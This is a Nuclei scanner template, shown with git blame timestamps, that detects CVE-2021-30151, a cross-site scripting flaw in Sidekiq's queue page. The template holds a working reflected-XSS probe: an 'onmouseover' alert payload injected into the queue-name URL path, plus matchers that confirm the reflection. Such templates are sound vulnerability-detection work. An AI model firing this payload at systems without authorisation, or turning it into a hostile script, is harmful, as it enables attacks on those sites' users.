nuclei-templates/cves/2021/CVE-2021-30151.yaml

38 lines
1020 B
YAML
Raw Normal View History

2021-04-10 17:28:27 +00:00
id: CVE-2021-30151
info:
name: Sidekiq 5.1.3 and 6.x-6.2.0 - Cross-Site Scripting
2021-04-10 17:28:27 +00:00
author: DhiyaneshDk
severity: medium
2021-04-10 19:30:49 +00:00
description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
reference:
2021-04-10 17:28:27 +00:00
- https://github.com/mperham/sidekiq/issues/4852
2021-04-10 18:07:38 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-30151
- https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-30151
cwe-id: CWE-79
tags: cve,cve2021,xss,sidekiq
2021-04-10 17:28:27 +00:00
requests:
- method: GET
path:
2021-04-10 18:17:02 +00:00
- '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"'
2021-04-10 17:28:27 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2021-04-10 19:30:49 +00:00
- "onmouseover=\"alert('nuclei')"
2021-04-11 12:21:41 +00:00
2021-04-10 17:28:27 +00:00
- type: word
part: header
words:
- "text/html"
2021-04-11 12:21:41 +00:00
- type: status
status:
- 200